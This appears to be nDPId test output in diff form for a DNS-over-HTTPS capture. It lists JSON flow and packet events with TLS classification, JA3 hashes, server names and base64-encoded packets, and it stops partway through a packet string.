-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":946739661512,"flow_last_seen":946739691599,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":4770,"flow_avg_l4_payload_len":366,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739374011,"flow_last_seen":946739404206,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3125,"flow_tot_l4_payload_len":5512,"flow_avg_l4_payload_len":324,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739311335,"flow_last_seen":946739327906,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1562,"flow_tot_l4_payload_len":5128,"flow_avg_l4_payload_len":301,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":946739603327,"flow_last_seen":946739633413,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3014,"flow_tot_l4_payload_len":4605,"flow_avg_l4_payload_len":383,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739401864,"flow_last_seen":946739432023,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":6872,"flow_avg_l4_payload_len":381,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739311703,"flow_last_seen":946739327879,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5538,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":946739378281,"flow_last_seen":946739408545,"flow_idle_time":7440000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6534,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739385090,"flow_last_seen":946739415188,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":5274,"flow_avg_l4_payload_len":329,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":946739380870,"flow_last_seen":946739411017,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4647,"flow_avg_l4_payload_len":221,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946739298533,"flow_last_seen":946739298798,"flow_idle_time":7440000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":3077,"flow_avg_l4_payload_len":769,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946739299058,"flow_last_seen":946739299326,"flow_idle_time":7440000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":3075,"flow_avg_l4_payload_len":768,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":946739348407,"flow_last_seen":946739365024,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3098,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":282,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":946739310588,"flow_last_seen":946739327990,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3100,"flow_tot_l4_payload_len":5402,"flow_avg_l4_payload_len":270,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":946739304432,"flow_last_seen":946739327879,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":8183,"flow_avg_l4_payload_len":272,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739385216,"flow_last_seen":946739415379,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4699,"flow_avg_l4_payload_len":261,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946739348961,"flow_last_seen":946739364914,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5460,"flow_avg_l4_payload_len":364,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739305016,"flow_last_seen":946739327879,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5516,"flow_avg_l4_payload_len":324,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739298533,"flow_last_seen":946739298533,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739298533,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00841{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946739298533,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739298533,"pkt":"REREREREZmZmZmZmCABFAAFD4UdAAL0GsQQKAAABi2PeSNGqAbt5f9qX6vvArlAYAfYrngAAFgMBARYBAAESAwPY4R+kmwrmRkwkOvmL20MZvvmmXV\/QYaA6X4C5e+GFvyA2SDuI+F1GOq7qyiEw+aePhhElQVpDVzMYXSdiyok3WQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG9oLTIuc2VieS5pbwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACA0hS9OEA\/J5twwMByNtSlpgrCPJW9Ooqwd+S9NxEdaCw=="} +00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739298533,"flow_last_seen":946739298533,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739298533,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02379{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946739298797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":946739298797,"pkt":"ZmZmZmZmRERERERECABFAAWq1TBAACsGSrWLY95ICgAAAQG70arq+8CueX\/bslAQAfmvXQAAFgMDAHoCAAB2AwOWvrm4FPC7V7PYuN+Lshod\/nezEzfqc01CK\/K8f2FrjCA2SDuI+F1GOq7qyiEw+aePhhElQVpDVzMYXSdiyok3WRMBAAAuACsAAgMEADMAJAAdACDl61zVHhMWB0BdL3ddlBFKSw5Lr9HVe6EkVLOcYVLAAxQDAwABARcDAwAksgraFQq8T84jfrRmYc223NGnVGbYG\/xj8xk4v\/EJCHm3s9w1FwMDCVmg97DgSdnn53nb0jGLv9F1+4VVO1DlJvFZ4CsfAqRyJ8a0jMqAaeRjhyCNwiDpU+6mevWKgpxWfYNjWShazkI7oaAh0ocoGs0\/Z2Mwn5ZIkIv+OuDwieAM9qTwhi+fGVM4H+qU8v3e8TtrqoxC+IgZVc8V3I+\/yPEjroPH33YYxxjju5aqvElJCjEI4urJQzXoWsAq6uQKccy5WfzKSDhJNZ8AVPquU8SpWKmo\/\/E2qD+dKLWJFgaub29gXMXjQTVzoJxdvVKG52mcWm6EXETLAVeqYVAn1jxtrmpkg13Vk85sRN2hjK5eeu4ap8rf7Lodf5tfmhv8SVfULmdGCNmmvgZMJkjmNfdKrw+XnrBHNQP2GC7kgKzhx++y9Ur+7CtcaZ0Stuv2mMWKbTn30OOZzAWiYjVeWw1PNj6IPMesZYC3bO1PwS8+BOlQEPumskRErqRklUuVJ1OXsXJn8o9P7B9r5RxumsKPZbrYuGjTJfVUwTIwaAH4g\/GODGK2+B5YB\/Z\/6LysjXxF0obthFSDlDUGBTCdDZdGFQyyl8u0xri2sr4xv5TWFpIjmyYys6SXqhW7QRXi8cM\/fGE\/JM+qZpyddar8bHdCLxGlvvPz4eCxh6lg0sugzb6K+mUo6W7gtEoQaKMIAakeMy2FOKQ3NMe5\/F+3b43gHog099YK8NKs2bvSG\/W7LXyo8PnUinj+AVLnzhrSe+qvDBw9a\/Jp7AkHbVoQwt\/EIF5\/d5w+4KMlJPMSzCUov8rfi\/CCF\/iVjvModtxk+gLz4pUaK3XRZHYtLxfH7FHcLizTZ3sSU4i+tweqvPEyxXE1E7Y+KMLDCV+QkbWkWi9gMec8ZJ3GBnIg+iSrehGCt8i8t7Lu9Wc\/2fGKgQfE9jJe\/fDA2odknuy5GV2960tQvEZAXB0c5GJBhjiPYJgYdgJ2fzUt\/xLgBoWg0zKHa\/soHWqBrLympLp+VepVMyzuzIJ6QgGVTCC1EFSrrSUxkNXDsBrwmyRP\/9FLF9pdzZACXTb6S8myrZazmvEdGdk04PjNhUiHGlUT03OYvmagf8Ya\/4VRzGGdV43OAGkQYeu0ZY\/heh9h7fucuCFB8CyBx4wy7OhYHBnDOYz2gdf\/z49N039rzJarMWXOwbROgeoXzcsBH8Uj6StZMCbM\/ZBGWByfEjHDl5w8E1dbyJx5XuC65RezHZrv05dJlBbVSEsHIMbDl7IWOUdhpeDNskZrQ+GdU5boLCtHmvrbs62KT\/zlJm2mOApHTvifRvmqKBz9tPtGNCG6XGCZWhEY3FFyS9rmcTpceJwTCfQYlzYKZslhMKd4J63ankp0RnGQLgodwM35ISK98+Kq2hNOJCTBOCxPPsHuXjZuhXdIi8QCW9VQZqww\/\/NjZPMOPy4jcZ7Tkixh7\/JmbpMEV7PnrhAXh21z+u5dLFH52pKdwGRat6A94UDcInit5rOcJtblnF8P7F8IlQqF3WFZurZBuXzllHTzbwe54UUGPwrqwyOIUkW6zUYU\/09YfhXdyYwY1MnGRAlrE9sPr4V9Vgn7ZntvhQgmKz\/jiHNHuRGaj\/PJAjEPTmoQib9SfYaA5fyYDQmsautNL\/cJ4oyfD9Jembyctib1BIp9Ramfe6PSsBXI\/0Ka52Or"} +00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739298533,"flow_last_seen":946739298797,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":1693,"flow_avg_l4_payload_len":846,"midstream":1,"thread_ts_msec":946739298797,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02292{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946739298797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1408,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1408,"pkt_l4_len":1374,"thread_ts_msec":946739298797,"pkt":"ZmZmZmZmRERERERECABFAAVy1TFAACsGSuyLY95ICgAAAQG70arq+8YweX\/bslAYAfkcrQAAThemFBuD34j0ZojpR7nDk08tEILyrSrE7HS0zZ4kmhXJJxPvCajO9mPz0f1Ba7CUeJZuC\/ww3Lrn+zD28CW1o9VT3LiWNj\/tk7IhVjR3oxyzXVyp8GIUKoCq+rFgLmVNv3t4E9NSsp0vzaP0F7j0JBrlPSojRxE2tlZsJ5feSSYzKGVucsWX6pYRquGlpuPfdHODx0L8ifTKNZ7sMGSXufTYU71W7zucIJWTJn92oiP3KQmXtYYb39SlVhRkoPmox0CcWIbUIkPk1mOfiZj7ZHZGdjmSkO+stoE+mAIy1qeh6xhTg7nyjAGvTt0OEbSBbL64py0gHtL8p9MnYDH\/rEu94PzROteC\/nq08LwZZof+0aydUgoyNJpYIzziL6obgZ8r3XFfT2yBZeGRYlK+7j980Fzg4IJlxXjB\/7u4t3CFM2KzwkVTOl0QgQ2WdVMZr63UzYIuBqVeqhjDwph8EAIPfj6GHii36awX1ARUIn+i2we8pqEICyjrrtz5abqrvBqhOgUymt9799jpjN96PN89rSa+qz8R5hSWva8Z0q12NMSUqK4V32q2T+XbFuVZUlGqNPo8Q4LGFZXuYD0rXuNudeUYIvyeE2j5uqdZqZHCJg4amyAZz0RTts0c1\/NYqX2y5hPaOLvInAlZn4kgRx8P3JUIFzzVPNJJ35uuAChT5mattKXxu8qwume7sBZMgcO4xIk9V0GeDf7Q0iqbxG1cZybv7JIhiCiaIbji819I0oDOejGbK2XffVEsRj3+LURpVM8fUmFAk669Ff\/Nr+yt6tH9Ktz6qOevm0rhgviDIUwzLNJNTxk3pvt9wNVus\/LUfcLiMKspToabUtDV2KtFlgjUQBZ6M603sQeMbcyD6v4zye6TReEZisbYDNmcge+IFl+e+6gIZYcwnBnjL+IMuKODuiRDaCLQJS72LiQoTClqyWNhk8p3nZX4LJsLVi6dW6cV7ErhFynQJtxWGrvo9DrmvbJGRV80Ul449jTrc22WvgTBKnaXTTsv2pw69IL3ziatAlwA6VUKivZyuSnP\/qeqQsLIM3h1xsud7x+raSQILbisV46QaEMOKNMhEo4f9EE5vYtzwm\/ngKP6CEyyxa5eOnqoj72FpXRNgDKcpbuNQSddL+rkopq\/y8uRR5TATut5xq9zEjEQLnRu3bhaqmLH7wPAre5tejGNaBElH9ZorCCzrnrfL+5ZFV65djnMn\/burxQW9SIIOlDcRe3ddZxIf\/z8dXGWfc\/YJ2alVKWABNBLcFPeFubCnDOGFnp7WaEezUQCo1huX1d\/AR2t9ZFIxb+\/2YA0Fcu4FFOucBmHB64h34YnG1QktWj0QN6yNlW1E24ubX3xPextdjh4av9ufsqLyV+lQC34GqCFKa3D2btbNVuYlf3F\/nsdPHHCRn+svJvZKssoO39MnIg20E8\/NZSYgAW7+dMxM2JbTCDpQf718V5e42Tcc3D\/MVuwLpSLFUnGgbahF3PvczhUvo5QFk5tF0YRiH+1QJX+P4Bld+SLzREBNKhff3\/yg9uJJKca+U+6nBcDAwCBaMxAcfS4h68NX8O4\/JsJCa+QWF87yNO9r0+szCZ1TeWGW\/KMvQNFzX1G+Y2PEnQ68hI4LpJQIC4VjBdW13rCggF8QR46NY3HL4enM7oteZTlqkQvxVphVmRyDsYFcjY4u2fGUw5LFrsQktQhx2VsQTygsXipX2KtdmPdscHLlgGRFwMDADV5C7WBlZ+ocDTA\/zppOjhaktsCXwO0sG+1hu0Zi0K+GaWwxXTJGdG0p2vdDlGf4dOI0eNxTQ=="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299058,"flow_last_seen":946739299058,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739299058,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00839{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":946739299058,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739299058,"pkt":"REREREREZmZmZmZmCABFAAFDIvZAAL0Gb1YKAAABi2PeSNGsAbu+7R6jIfk4pVAYAfYrngAAFgMBARYBAAESAwOSQ8JxHhGuu6wLKnGtwDfaCU9fn2zkXyLvCqG6Z1EJrSA97l3xa4NDBUHApuStJw5z26JVCZKgohlNqcovRpE62AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG9oLTIuc2VieS5pbwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACBvduxHcveHyzSwUHe1UMoR3WO30Q1YJASO6Gqd5f5rOQ=="} +00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299058,"flow_last_seen":946739299058,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739299058,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02367{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":946739299325,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":946739299325,"pkt":"ZmZmZmZmRERERERECABFAAWq+oRAACsGJWGLY95ICgAAAQG70awh+Tilvu0fvlAQAflBFAAAFgMDAHoCAAB2AwO4E1L4A\/\/vaa3qFy7zGtkSllYVpFARFReL8E9wQ5edfiA97l3xa4NDBUHApuStJw5z26JVCZKgohlNqcovRpE62BMBAAAuACsAAgMEADMAJAAdACC6hi7aKoaulrg0kHVy9iX3JtIXsjOWFqMY4JtXoR3ZFBQDAwABARcDAwAkVn7ui3VtyEjBPho8csX4cWU91LDHlldd37yMDuMkm1WrNSA\/FwMDCVkNxERPpxFp1hU3MTygH94nI+uO3MFA6Pgc7Cjgsqv9R94L1LzqnlTJ9qM2GdC3DoaCFMZy2rvnd3TUb44js1wH\/ZjR\/tueYjuCchsydXsjOJIItHXpv6rNdoQc5GxilmSN3ZLV0BdssW6zhxxgQaE3FYajxWXTTfgzUzOS+6W++jmvd1q00zg+8Q0qSguzfNUtyikLzjXqF591w71tmw1RwueDWDRqOR8D9ArOOASC\/gfHKocbf3MYoPn\/L3+LeyjDo7Dan2mPuEUKlItjagedNzassvjfnCKDfWzjTYX1Oj074zzZKYUi326SCBVqvZ4BTAJFklyVRE2\/7w5a9Hu3TkucSU4uD6YDgHvYuwr1PUeuJlpLcTtMIe6KqdQO6VhykmmEfKts